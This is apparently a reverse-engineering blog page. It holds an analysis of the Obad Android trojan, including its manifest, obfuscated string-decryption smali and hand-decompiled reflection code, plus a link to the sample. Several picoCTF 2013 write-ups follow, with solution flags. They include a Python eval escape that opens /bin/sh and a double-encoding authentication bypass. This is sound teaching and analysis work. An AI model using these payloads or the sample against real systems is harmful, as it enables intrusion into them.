Analysing Backdoor.AndroidOS.Obad.a

Today i am going to write about my own analysis of “The Most Sophisticated Android Trojan which Kaspersky Labs blogged about here.

http://www.securelist.com/en/blog/8106/The_most_sophisticated_Android_Trojan

I’ve managed to grab a copy of the sample from Mila Parkour
I’ve placed a copy of the sample here and the pw to the archive is “infected“.
F7BE25E4F19A3A82D2E206DE8AC979C8
MD5: F7BE25E4F19A3A82D2E206DE8AC979C8

For this particular Android malware, if you simply use dex2jar+JD-GUI, you will realised that most of the methods can’t be decompiled.

Furthermore, i’ve realised that the method which it managed to decompiled looked slightly wrong too.
This is the method which i will discuss for now

Initial Analysis:
I will go through with my manual approach as well

Basically for a start, i would recommend you to use apktool first.

apktool.bat d <filename>

1	apktool.bat d <filename>

You should see something like this after running the above command.

    C:\Users\Gunther\Desktop\apktool>apktool.bat d F7BE25E4F19A3A82D2E206DE8AC979C8
    I: Baksmaling...
    I: Loading resource table...
    I: Loaded.
    I: Decoding AndroidManifest.xml with resources...
    I: Loading resource table from file: C:\Users\Jacob\apktool\framework\1.apk
    I: Loaded.
    I: Regular manifest package...
    I: Decoding file-resources...
    I: Decoding values */* XMLs...
    I: Done.
    I: Copying assets and libs...
    C:\Users\Gunther\Desktop\apktool>

C:\Users\Gunther\Desktop\apktool>apktool.bat d F7BE25E4F19A3A82D2E206DE8AC979C8

I: Baksmaling...

I: Loading resource table...

I: Loaded.

I: Decoding AndroidManifest.xml with resources...

I: Loading resource table from file: C:\Users\Jacob\apktool\framework\1.apk

I: Loaded.

I: Regular manifest package...

I: Decoding file-resources...

I: Decoding values */* XMLs...

I: Done.

I: Copying assets and libs...

C:\Users\Gunther\Desktop\apktool>

Now let’s take a look at the AndroidManifest.xml file, you should see the the permissions requested by the APK file like here.

<?xml version="1.0" encoding="utf-8"?>
<manifest ="singleTop" android:versionCode="3" ="3.0" android:installLocation="internalOnly" package="com.android.system.admin"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-permission ="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission ="android.permission.READ_LOGS" />
    <uses-permission ="android.permission.WAKE_LOCK" />
    <uses-permission ="android.permission.READ_PHONE_STATE" />
    <uses-permission ="android.permission.PROCESS_OUTGOING_CALLS" />
    <uses-permission ="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission ="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission ="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission ="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission ="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission ="android.permission.CHANGE_NETWORK_STATE" />
    <uses-permission ="android.permission.MODIFY_PHONE_STATE" />
    <uses-permission ="android.permission.WRITE_SECURE_SETTINGS" />
    <uses-permission ="android.permission.WRITE_SETTINGS" />
    <uses-permission ="android.permission.INTERNET" />
    <uses-permission ="android.permission.BLUETOOTH" />
    <uses-permission ="android.permission.BLUETOOTH_ADMIN" />
    <uses-permission ="android.permission.ACCESS_BLUETOOTH_SHARE" />
    <uses-permission ="android.permission.RECEIVE_SMS" />
    <uses-permission ="android.permission.SEND_SMS" />
    <uses-permission ="android.permission.READ_SMS" />
    <uses-permission ="android.permission.WRITE_SMS" />
    <uses-permission ="android.permission.READ_CONTACTS" />
    <uses-permission ="android.permission.CALL_PHONE" />
    <uses-permission ="android.permission.RAISED_THREAD_PRIORITY" />
    <application =".OcooIclc">
        <activity ="System" =".OclIIOlC">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity ="System" =".cOOCoCc" ="singleTop" />
        <service =".AdminService" />
        <receiver ="System" =".AdminReceiver" ="android.permission.BIND_DEVICE_ADMIN">
            <meta-data ="android.app.device_admin" ="@xml/cocloo" />
            <intent-filter>
                <action android:name="com.strain.admin.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
        <service =".MainService" />
        <receiver =".OlOClICl">
            <intent-filter ="1000">
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.QUICKBOOT_POWERON" />
                <action android:name="android.intent.action.USER_PRESENT" />
            </intent-filter>
        </receiver>
        <receiver =".OooOOOo">
            <intent-filter ="1000">
                <action android:name="android.intent.action.TIME_SET" />
                <action android:name="android.intent.action.TIMEZONE_CHANGED" />
                <action android:name="android.intent.action.TIME_CHANGED" />
                <action android:name="android.intent.action.DATE_CHANGED" />
            </intent-filter>
        </receiver>
        <receiver =".CIcIoICo">
            <intent-filter ="1000">
                <action android:name="android.intent.action.PHONE_STATE" />
                <action android:name="android.intent.action.NEW_OUTGOING_CALL" />
            </intent-filter>
        </receiver>
        <receiver =".OOOOlIO">
            <intent-filter ="1000">
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <service =".CCOloCco" ="true">
            <intent-filter ="1000">
                <action android:name="com.android.ussd.IExtendedNetworkService" />
                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </service>
    </application>
</manifest>

<?xml version="1.0" encoding="utf-8"?>

<manifest ="singleTop" android:versionCode="3" ="3.0" android:installLocation="internalOnly" package="com.android.system.admin"

xmlns:android="http://schemas.android.com/apk/res/android">

<uses-permission ="android.permission.RECEIVE_BOOT_COMPLETED" />

<uses-permission ="android.permission.READ_LOGS" />

<uses-permission ="android.permission.WAKE_LOCK" />

<uses-permission ="android.permission.READ_PHONE_STATE" />

<uses-permission ="android.permission.PROCESS_OUTGOING_CALLS" />

<uses-permission ="android.permission.READ_EXTERNAL_STORAGE" />

<uses-permission ="android.permission.WRITE_EXTERNAL_STORAGE" />

<uses-permission ="android.permission.ACCESS_WIFI_STATE" />

<uses-permission ="android.permission.CHANGE_WIFI_STATE" />

<uses-permission ="android.permission.ACCESS_NETWORK_STATE" />

<uses-permission ="android.permission.CHANGE_NETWORK_STATE" />

<uses-permission ="android.permission.MODIFY_PHONE_STATE" />

<uses-permission ="android.permission.WRITE_SECURE_SETTINGS" />

<uses-permission ="android.permission.WRITE_SETTINGS" />

<uses-permission ="android.permission.INTERNET" />

<uses-permission ="android.permission.BLUETOOTH" />

<uses-permission ="android.permission.BLUETOOTH_ADMIN" />

<uses-permission ="android.permission.ACCESS_BLUETOOTH_SHARE" />

<uses-permission ="android.permission.RECEIVE_SMS" />

<uses-permission ="android.permission.SEND_SMS" />

<uses-permission ="android.permission.READ_SMS" />

<uses-permission ="android.permission.WRITE_SMS" />

<uses-permission ="android.permission.READ_CONTACTS" />

<uses-permission ="android.permission.CALL_PHONE" />

<uses-permission ="android.permission.RAISED_THREAD_PRIORITY" />

<intent-filter>

</intent-filter>

</activity>

<intent-filter>

</intent-filter>

</receiver>

<intent-filter ="1000">

</intent-filter>

</receiver>

<intent-filter ="1000">

</intent-filter>

</receiver>

<intent-filter ="1000">

</intent-filter>

</receiver>

<intent-filter ="1000">

</intent-filter>

</receiver>

<intent-filter ="1000">

</intent-filter>

</service>

</application>

</manifest>

From the AndroidManifest.xml, we also know the following
1.) This malware have several “service” entries.
Furthermore, if we look up http://developer.android.com/guide/topics/manifest/intent-filter-element.html we can see that it indicates to have a high priority.
2.) There is an Activity entry and under the “intent” tag of this Activity entry. It indicates to start as the main entry point according to http://developer.android.com/reference/android/content/Intent.html#ACTION_MAIN

According to the official diagram from Android, we should be looking at “OnCreate” function first.

3.) Earlier on, i’ve written that there are several “Service” being started by this app. According to http://developer.android.com/reference/android/app/Service.html We should be looking at “OnCreate” or “StartService” in those class file(s).

This “Service” is running in the background even when the user is not directly interacting with the application.

Analysis of Dalvik Code:
Normally i would suggest looking at the “onCreate” function first. Iin order to have a better understanding of Dalvik byte code, it’s probably better to have either of the following 2 links:
http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html
http://source.android.com/tech/dalvik/dalvik-bytecode.html

Now before we go to “OnCreate“, earlier on i’ve mentioned that Dex2Jar screwed it up right.
According to the AndroidManifest.xml, the file with “android.intent.action.MAIN” intention is OclIIOlC. But let’s look at “cOIcOOo” method in this smali file, “OclIIOlC” first.

In order to understand better, it would be preferred to take a look at the original smali code and then this one which i have added with comments.

.method private static cOIcOOo(III)Ljava/lang/String;
// private static String cOIcOOo(Int paramInt1, Int paramInt2, Int paramInt3){
    .locals 6
    sget-object byteArray1, Lcom/android/system/admin/OclIIOlC;->cOIcOOo:[B
    // byte[] byteArray1 = OclIIOlC.cOIcOOo;
    add-int/lit8 p0, p0, 0x60
    // paramInt1 = paramInt1+0x60
    add-int/lit8 paramInt3, paramInt3, 0x21
    // paramInt3 = paramInt3+0x21;
    const/4 k, 0x0
    // int k = 0;
    new-instance v0, Ljava/lang/String;
    // String v0;
    new-array byteArray2, paramInt3, [B
    // byte[] byteArray2 = new byte[paramInt3];
    if-nez byteArray1, :cond_0
    // if( byteArray1==null ){
    move v2, paramInt3
    // v2 = paramInt3;
    // }
    move v3, paramInt2
    // v3 = paramInt2;
:goto_0
    add-int/lit8 paramInt2, paramInt2, 0x1
    // paramInt2 += 1;
    // or paramInt2++;
    add-int/2addr v2, v3
    // v2 += v3;
    add-int/lit8 paramInt1, v2, -0x2
    // paramInt1 = v2 + (-0x2);
:cond_0
    int-to-byte v2, paramInt1
    aput-byte v2, byteArray2, k
    // Puts the byte value in v2 into an element of a byte array. The element is indexed by k, the array object is referenced by byteArray2.
    // byteArray2[k] = v2;
    add-int/lit8 k, k, 0x1
    // k +=0x1;
    // or k++;
    if-lt k, paramInt3, :cond_1
    // if( k>=paramInt3 ){
    const/4 v2, 0x0
    // v2 = 0x0;
    invoke-direct {v0, byteArray2, v2}, Ljava/lang/String;-><init>([BI)V
    return-object v0
    // return new String(byteArray2, v2);
:cond_1
    move v2, paramInt1
    // v2 = paramInt1;
    aget-byte v3, byteArray1, paramInt2
    // Gets a byte value of a byte array into v3. The array is referenced by byteArray1 and is indexed by paramInt2.
    // v3 = byteArray1[paramInt2];
    goto :goto_0
.end method
}

.method private static cOIcOOo(III)Ljava/lang/String;

// private static String cOIcOOo(Int paramInt1, Int paramInt2, Int paramInt3){

.locals 6

sget-object byteArray1, Lcom/android/system/admin/OclIIOlC;->cOIcOOo:[B

// byte[] byteArray1 = OclIIOlC.cOIcOOo;

add-int/lit8 p0, p0, 0x60

// paramInt1 = paramInt1+0x60

add-int/lit8 paramInt3, paramInt3, 0x21

// paramInt3 = paramInt3+0x21;

const/4 k, 0x0

// int k = 0;

new-instance v0, Ljava/lang/String;

// String v0;

new-array byteArray2, paramInt3, [B

// byte[] byteArray2 = new byte[paramInt3];

if-nez byteArray1, :cond_0

// if( byteArray1==null ){

move v2, paramInt3

// v2 = paramInt3;

// }

move v3, paramInt2

// v3 = paramInt2;

:goto_0

add-int/lit8 paramInt2, paramInt2, 0x1

// paramInt2 += 1;

// or paramInt2++;

add-int/2addr v2, v3

// v2 += v3;

add-int/lit8 paramInt1, v2, -0x2

// paramInt1 = v2 + (-0x2);

:cond_0

int-to-byte v2, paramInt1

aput-byte v2, byteArray2, k

// Puts the byte value in v2 into an element of a byte array. The element is indexed by k, the array object is referenced by byteArray2.

// byteArray2[k] = v2;

add-int/lit8 k, k, 0x1

// k +=0x1;

// or k++;

if-lt k, paramInt3, :cond_1

// if( k>=paramInt3 ){

const/4 v2, 0x0

// v2 = 0x0;

invoke-direct {v0, byteArray2, v2}, Ljava/lang/String;-><init>([BI)V

return-object v0

// return new String(byteArray2, v2);

:cond_1

move v2, paramInt1

// v2 = paramInt1;

aget-byte v3, byteArray1, paramInt2

// Gets a byte value of a byte array into v3. The array is referenced by byteArray1 and is indexed by paramInt2.

// v3 = byteArray1[paramInt2];

goto :goto_0

.end method

}

Now compare it with this snippet which i’ve attached here. This should be the way to reverse the Dalvik Opcode back to Java source code…i think.

 public static String cOIcOOo(int paramInt1, int paramInt2, int paramInt3){
        byte[] byteArray1 = cOIcOOo;
        int iValue = paramInt1+96;
        int iIndex = paramInt3+33;
        int k = 0;
        int m = 0;
        int n = 0;
        byte[] byteArray2 = new byte[iIndex];
        if( byteArray1==null ){
            m = j;
            n = paramInt2;
        }else{
            while(true){
                byteArray2[k] = (byte)iValue;
                k++;
                if( k>=iIndex ){ //:cond_1
                    return new String(byteArray2, 0);
                }else{
                    m = iValue;
                    n = byteArray1[paramInt2];
                }
                paramInt2++;
                iValue = m + n - 2;
            }
        }
        return "0";
    }

public static String cOIcOOo(int paramInt1, int paramInt2, int paramInt3){

byte[] byteArray1 = cOIcOOo;

int iValue = paramInt1+96;

int iIndex = paramInt3+33;

int k = 0;

int m = 0;

int n = 0;

byte[] byteArray2 = new byte[iIndex];

if( byteArray1==null ){

m = j;

n = paramInt2;

}else{

while(true){

byteArray2[k] = (byte)iValue;

k++;

if( k>=iIndex ){ //:cond_1

return new String(byteArray2, 0);

}else{

m = iValue;

n = byteArray1[paramInt2];

}

paramInt2++;

iValue = m + n - 2;

}

return "0";

}

Ok, i’ve also mentioned before on why AVs and some of the tools don’t work.
Most of the better Android malware nowadays uses Reflection API.
Reflection can allow a program to create a “function pointer” and invoke the target function by using it. You can see it’s common usage in ExploitKits or those Java exploits.

You will see it when you start reversing “OnCreate” function now.
This is the pseudo Java source code for “onCreate” which i have decompiled manually.

protected void onCreate(Bundle bundle_arg){
    super.onCreate(bundle_arg);
    
    String v1;
    Object[] v1;
    Class c0, c2, c4;
    Object p1;
    
    if( Class.forName(OclIIOlC.cOIcOOo(1,21,-17)).getField(OclIIOlC.cOIcOOo(-19,164,-28)).get(null).equals(new String (CIOIIolc.IoOoOIOI(CIOIIolc.cOIcOOo(IoOoOIOI.cOIcOOo(OclIIOlC.cOIcOOo(3,69,-29)), CIOIIolc.cOIcOOo(ocOlcICo.cOIcOOo(126,-16,-9).getBytes()))))) ){
        System.exit(0);
    }
    
    Context c0 = OcooIclc.cOIcOOo;
    Class c3 = MainService.class;
    
    try{
        v1 = new Object[2];
        v1[1] = c3;
        v1[0] = c0;
        
        c0 = Class.forName(OclIIOlC.cOIcOOo(1,48,-11));
        c2 = new Class[2];
        c2[0] = Class.forName(OclIIOlC.cOIcOOo(1,11,-10));   
        Class v3;        
        c2[1] = v3;
        p1 = c0.getDeclaredConstructor(c2).newInstance(v1);
    }catch{Throwable t1){
        throw t1.getCause();
    }
    
    try{
        v1 = new Object[1];
        v1[0] = Integer.valueOf(268435456);
        c0 = Class.forName(OclIIOlC.cOIcOOo(1,48,-11));
        String v2 = OclIIOlC.cOIcOOo(1,72,-25);
        c4 = new Class[1];
        c4[0] = Integer.TYPE;
        Object v0 = c0.getMethod(OclIIOlC.cOIcOOo(1,72,-25), c4).invoke(p1, v1);
    }catch{Throwable t1){
        throw t1.getCause();
    }
    Context con1 = OcooIclc.cOIcOOo;
    
    try{
        Object v2 = new Object[1];
        v2[0] = p1;
        Class v0 = Class.forName(OclIIOlC.cOIcOOo(1,11,-10));
        String v3 = OclIIOlC.cOIcOOo(19,0,-21);
        Class v4 = new Class[1];
        Class v5 = Class.forName(OclIIOlC.cOIcOOo(1,48,-11));
        v4[0] = Class.forName(OclIIOlC.cOIcOOo(1,48,-11));
        v0.getMethod(OclIIOlC.cOIcOOo(19,0,-21), v4).invoke(con1, v2);
    }catch{Throwable t1){
        throw t1.getCause();
    }
    con1 = this.getApplicationContext();
    
    try{
        Object v1 = Class.forName(OclIIOlC.cOIcOOo(1,11,-10)).getMethod(OclIIOlC.cOIcOOo(7,168,-16),null).invoke(con1,null);
    }catch{Throwable t1){
        throw t1.getCause();
    }
    
    ComponentName comName = this.getComponentName();
    
    try{
        Object[] v2 = new Object[3];
        v2[2] = Integer.valueOf(1);
        v2[1] = Integer.valueOf(2);
        v2[0] = comName;
        Class v0 = Class.forName(OclIIOlC.cOIcOOo(1,79,0));
        String v3 = OclIIOlC.cOIcOOo(19,111,-7);
        Class[] v4 = new Class[3];
        Class v5 = Class.forName(OclIIOlC.cOIcOOo(1,136,-4));
        v4[0] = Class.forName(OclIIOlC.cOIcOOo(1,136,-4));
        v4[1] = Integer.TYPE;
        v4[2] = Integer.TYPE;
        v0.getMethod(OclIIOlC.cOIcOOo(19,111,-7),v4).invoke(this.getApplicationContext(), v2);
    }catch(Throwable v0_1){
        throw v0_1.getCause();
    }
    this.finish();
}

protected void onCreate(Bundle bundle_arg){

super.onCreate(bundle_arg);

String v1;

Object[] v1;

Class c0, c2, c4;

Object p1;

if( Class.forName(OclIIOlC.cOIcOOo(1,21,-17)).getField(OclIIOlC.cOIcOOo(-19,164,-28)).get(null).equals(new String (CIOIIolc.IoOoOIOI(CIOIIolc.cOIcOOo(IoOoOIOI.cOIcOOo(OclIIOlC.cOIcOOo(3,69,-29)), CIOIIolc.cOIcOOo(ocOlcICo.cOIcOOo(126,-16,-9).getBytes()))))) ){

System.exit(0);

}

Context c0 = OcooIclc.cOIcOOo;

Class c3 = MainService.class;

try{

v1 = new Object[2];

v1[1] = c3;

v1[0] = c0;

c0 = Class.forName(OclIIOlC.cOIcOOo(1,48,-11));

c2 = new Class[2];

c2[0] = Class.forName(OclIIOlC.cOIcOOo(1,11,-10));

Class v3;

c2[1] = v3;

p1 = c0.getDeclaredConstructor(c2).newInstance(v1);

}catch{Throwable t1){

throw t1.getCause();

}

try{

v1 = new Object[1];

v1[0] = Integer.valueOf(268435456);

c0 = Class.forName(OclIIOlC.cOIcOOo(1,48,-11));

String v2 = OclIIOlC.cOIcOOo(1,72,-25);

c4 = new Class[1];

c4[0] = Integer.TYPE;

Object v0 = c0.getMethod(OclIIOlC.cOIcOOo(1,72,-25), c4).invoke(p1, v1);

}catch{Throwable t1){

throw t1.getCause();

}

Context con1 = OcooIclc.cOIcOOo;

try{

Object v2 = new Object[1];

v2[0] = p1;

Class v0 = Class.forName(OclIIOlC.cOIcOOo(1,11,-10));

String v3 = OclIIOlC.cOIcOOo(19,0,-21);

Class v4 = new Class[1];

Class v5 = Class.forName(OclIIOlC.cOIcOOo(1,48,-11));

v4[0] = Class.forName(OclIIOlC.cOIcOOo(1,48,-11));

v0.getMethod(OclIIOlC.cOIcOOo(19,0,-21), v4).invoke(con1, v2);

}catch{Throwable t1){

throw t1.getCause();

}

con1 = this.getApplicationContext();

try{

Object v1 = Class.forName(OclIIOlC.cOIcOOo(1,11,-10)).getMethod(OclIIOlC.cOIcOOo(7,168,-16),null).invoke(con1,null);

}catch{Throwable t1){

throw t1.getCause();

}

ComponentName comName = this.getComponentName();

try{

Object[] v2 = new Object[3];

v2[2] = Integer.valueOf(1);

v2[1] = Integer.valueOf(2);

v2[0] = comName;

Class v0 = Class.forName(OclIIOlC.cOIcOOo(1,79,0));

String v3 = OclIIOlC.cOIcOOo(19,111,-7);

Class[] v4 = new Class[3];

Class v5 = Class.forName(OclIIOlC.cOIcOOo(1,136,-4));

v4[0] = Class.forName(OclIIOlC.cOIcOOo(1,136,-4));

v4[1] = Integer.TYPE;

v4[2] = Integer.TYPE;

v0.getMethod(OclIIOlC.cOIcOOo(19,111,-7),v4).invoke(this.getApplicationContext(), v2);

}catch(Throwable v0_1){

throw v0_1.getCause();

}

this.finish();

}

We can see from the pseudo Java code that all external methods are called via Reflection.
Now if you go through each class, you will discover that each class had it’s own way of decrypting the strings but the general logic is quite similar.
Now that we have gone through the decrypting method and the onCreate method. The rest of the class files are not a problem.

I’ll update this blog post as i reverse it as it’s tiring to reverse it while changing diapers in between. xDDD

BR,
[ Gunther ]

picoCTF 2013 – DDoS Detection (85pts)

It appears a SYN-flood style DDoS has been carried out on this system. Send us a list of the IP addresses of the attackers (in any order, separated by spaces), so we can track them down and stop them.

Pcap available to download here, or available to analyse online at CloudShark

Ok, as usual here is the backup of the file.
syn_attack

Let’s open the pcap file with wireshark.
Since we are looking for traces, we can use a quick filter, “tcp.flags.syn==1”

Using the above filter, we should have this.
Now let’s remove all the IPs for Google, Twitter and we should have all the IPs of the attackers.

Since the key to this challenge is the IPs of the attackers.
Their IPs are as follows:

121.168.84.32 75.214.206.60 21.241.212.197 55.53.190.191 71.113.17.64 120.130.138.152 171.128.49.99 104.220.68.36 241.210.41.46 33.24.97.48 115.99.66.210 154.29.81.178 69.232.82.51 234.183.31.38 102.146.88.253 196.132.138.81 63.193.172.89 16.6.74.206 94.148.118.202 160.116.210.243 248.237.9.18 161.147.211.153 207.137.67.221 229.61.253.52 180.70.211.154 132.214.137.24 132.42.241.177 65.248.11.247 49.201.237.5 51.145.58.158

121.168.84.32 75.214.206.60 21.241.212.197 55.53.190.191 71.113.17.64 120.130.138.152 171.128.49.99 104.220.68.36 241.210.41.46 33.24.97.48 115.99.66.210 154.29.81.178 69.232.82.51 234.183.31.38 102.146.88.253 196.132.138.81 63.193.172.89 16.6.74.206 94.148.118.202 160.116.210.243 248.237.9.18 161.147.211.153 207.137.67.221 229.61.253.52 180.70.211.154 132.214.137.24 132.42.241.177 65.248.11.247 49.201.237.5 51.145.58.158

BR,
[ Gunther ] of ARTeam

picoCTF 2013 – PHP2 (85pts)

We found a simple web page that seems to want us to authenticate, but we can’t figure out how… can you?

Accessing the given link, we will see this.

Ok, let’s view the source of the page and see whether there are more clues for this.
Immediately,we can see that it’s asking use to take a look at “index.phps” for more clues.

Looking at “index.phps”, we can see the actual code for the challenge minus the key of course.

Ok, we need to have the url like this.

https://picoctf.com/problems/php2/?id=admin

BUT, there is a call to urldecode before the check.
Thus, the above url will not be allowed.
So how are we going to bypass that?
Since there are no further filter and checks, one of the easiest is to use “Double Encoding”
Using the following url:

https://picoctf.com/problems/php2/?id=%2561%2564%256d%2569%256e

We will see this.

The key is
Key: b4cc845aa05ed9b0ce823cb04f253e27

BR,
[ Gunther ] of ARTeam

picoCTF 2013 – avaJ (85pts)

Hmmm…we were only given a link to the file, elif avaJ

I’ve placed a backup of the file Crackme2.

Ok, since it’s a .class file, let’s fire up JD-GUI for a quick look at it.

As we can see from the above image , it’s checking our input against a Char array.
That char array is the key to this challenge.
The key is “iT6chiweTohy4oot”

BR,
[ Gunther ] of ARTeam

picoCTF 2013 – Python Eval 1 (85pts)

A wise master wishes to teach you an ancient art: Python Eval 1.

Accessing that link you will see basically it’s telling us that using Python’s “eval” is wrong and dangerous.
If you had read about this, http://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html.
You will realise that it’s possible to read the value of “flag”.
In Python, a type object has a __bases__ attribute which returns the list of all its base classes. It also has a __subclasses__ method that returns the list of all types that inherit from it.
Thus, there are many ways to solve this.
I will show 2 methods which allows us to read the value of flag.
The first example here explicitly reads the value of flag.

object.__subclasses__()[20](flag).read()

1	object.__subclasses__()[20](flag).read()

The 2nd method here allows me to execute /bin/sh.
You can import modules dynamically in Python.
The built-in __import__ function accomplishes the same goal as using the import statement, but it’s an actual function, and it takes a string as an argument.

__import__('os').execl('/bin/sh','-i')

1	__import__('os').execl('/bin/sh','-i')

Then i will proceed to cat task1.py as shown here.

As we can see from the 2 examples, the key is “eval_is_best_thing_evar”
The following are some good read which i’ll recommend for better understanding.

http://www.diveintopython.net/object_oriented_framework/defining_classes.html

http://www.diveintopython.net/functional_programming/dynamic_import.html

BR,
[ Gunther ] of ARTeam

picoCTF 2013 – Robomunication (80pts)

We recorded the following communication between two robots. Find out what evil things they are plotting, and recover their secret key!

As usual, this is the backup of robo.mp3.
robo

AFter hearing it for 5times, i realised the robotics sounds equate to Morse Code.

So finally i’m able to decode that to the following.

---- H
- E
-=-- L
-=-- L
=== O

-== W
---- H
-= A
= T

-- I
---S

= T
---- H
- E

=-= K
- E
=-== Y

-- I
= T

-- I
--- S

=--- B
=== O
=== O
-==-P
=--- B
- E
- E
-==-P

---- H

- E

-=-- L

=== O

-== W

---- H

-= A

= T

-- I

---S

= T

---- H

- E

=-= K

- E

=-== Y

-- I

= T

-- I

--- S

=--- B

=== O

-==-P

=--- B

- E

-==-P

The key to this challenge is “BOOPBEEP”

BR,
[ Gunther ] of ARTeam

picoCTF 2013 – Pilot Logic (75pts)

You’ve gotten a partial dump of the disk from the hangar’s machine, and you’re pretty sure the pilot’s password is cleverly hidden somewhere within it…

The disk image can be found on the shell machines at /problems/pilot_logic.img and the contents of the image are available in /problems/pilot_logic/

I’ve uploaded the pilot_image here.
Backup of pilot_image

Well, the clue was “pilot’s password”.
Immediately, i opened the file using FTK Imager and look for files under pilotbot’s directories.
FTK Imager is a free and useful tool. You can grab a copy of that here. http://www.accessdata.com/support/product-downloads

We can see clearly that the key to this challenge is “You can’t take the sky from me”

BR,
[ Gunther ] of ARTeam

picoCTF 2013 – Client-Side is the Best Side (75pts)

Luckily the ship has a web-based authentication system! Hmm…even though you don’t know the password, I bet you can still get in!

When we visits the provided link, we will see something like this.

So it’s asking us for our credentials, but let’s view the page’s source first.
Upon doing that, we saw this interesting function.

Ah, so if we can figure out the correct password, we will be re-directed to “aebe515f7c62b96ad7de047c11aa3228.html”
Well, why waste time on figuring out the correct password if something important is stored on “aebe515f7c62b96ad7de047c11aa3228.html”

Let’s visit https://picoctf.com/problems/aebe515f7c62b96ad7de047c11aa3228.html
W00t H00t, visiting the above url, we saw this.

For those, who are still interested in finding out the password to reach the final url.
Just do a quick search on “03318769a5ee1354f7479acc69755e7c” using your favourite search engine and you will know that is the md5 hash of “dinosaur”

The key to this challenge is
Key: cl13nt_s1d3_1s_w0rst_s1d3

BR,
[ Gunther ] of ARTeam

picoCTF 2013 – RSA (70pts)

Math is cool! Use the RSA algorithm to decode the secret message, c, p, q, and e are parameters for the RSA algorithm. Problem

This is the backup of the problem.
rsa

I didn’t solve this in time but after looking online on the RSA algorithm, i’ve finally figured it out that it wasn’t too difficult since we were given all the necessary values to decrypt the message.
This is my solution written in python based on this webpage’s algorithm.

import os,sys

def inverse(a,n):
    b = n
    x = 0
    d = 1
    
    while( a>=1 ):
        q = b/a
        y = a
        a = b%a
        b = y
        y = d
        d = x-(q*d)
        x = y
    x = x%n
    if (x<=0):
        x = (x+n)%n
    return x

p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483
q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407
e = 65537
C = 83208298995174604174773590298203639360540024871256126892889661345742403314929861939100492666605647316646576486526217457006376842280869728581726746401583705899941768214138742259689334840735633553053887641847651173776251820293087212885670180367406807406765923638973161375817392737747832762751690104423869019034

n = p*q
print("value of n: %d\n" % n)
m = (p-1)*(q-1)
print("value of m: %d\n" % m)
d = inverse(e, m)
print("value of d: %d\n" % d)
M = pow(C, d, n)
print("value of M: %d\n" % M)

import os,sys

def inverse(a,n):

b = n

x = 0

d = 1

while( a>=1 ):

q = b/a

y = a

a = b%a

b = y

y = d

d = x-(q*d)

x = y

x = x%n

if (x<=0):

x = (x+n)%n

return x

p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483

q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407

e = 65537

C = 83208298995174604174773590298203639360540024871256126892889661345742403314929861939100492666605647316646576486526217457006376842280869728581726746401583705899941768214138742259689334840735633553053887641847651173776251820293087212885670180367406807406765923638973161375817392737747832762751690104423869019034

n = p*q

print("value of n: %d\n" % n)

m = (p-1)*(q-1)

print("value of m: %d\n" % m)

d = inverse(e, m)

print("value of d: %d\n" % d)

M = pow(C, d, n)

print("value of M: %d\n" % M)

BR,
[ Gunther ] of ARTeam

picoCTF 2013 – NAVSAT (70pts)

Near the Sun, you find a malfunctioning warp beacon which is broadcasting a distress signal in a navigational channel. It looks like it’s been damaged by solar radiation, and some of its data have been corrupted. If you can recover it, perhaps it will point at you to something interesting.

This is the backup of the original recovery.zip
recovery
If you tried to unzip the file, there is a Mag7-BW folder comprising of 2 files, Chart-15.pdf & key.txt
However, we can’t extract key.txt with most of the tools out there.
So i’ve decided to use Notepad++ to read the zip file since key.txt is just a text file. I’m sure i can find some useful strings in there.
So i did a quick find on “key” and i’ve found this.

The key is “Next stop Tau Eridani”

BR,
[ Gunther ] of ARTeam

Reversing 'R' US

Just another WordPress site

Analysing Backdoor.AndroidOS.Obad.a

picoCTF 2013 – DDoS Detection (85pts)

picoCTF 2013 – PHP2 (85pts)

picoCTF 2013 – avaJ (85pts)

picoCTF 2013 – Python Eval 1 (85pts)

picoCTF 2013 – Robomunication (80pts)

picoCTF 2013 – Pilot Logic (75pts)

picoCTF 2013 – Client-Side is the Best Side (75pts)

picoCTF 2013 – RSA (70pts)

picoCTF 2013 – NAVSAT (70pts)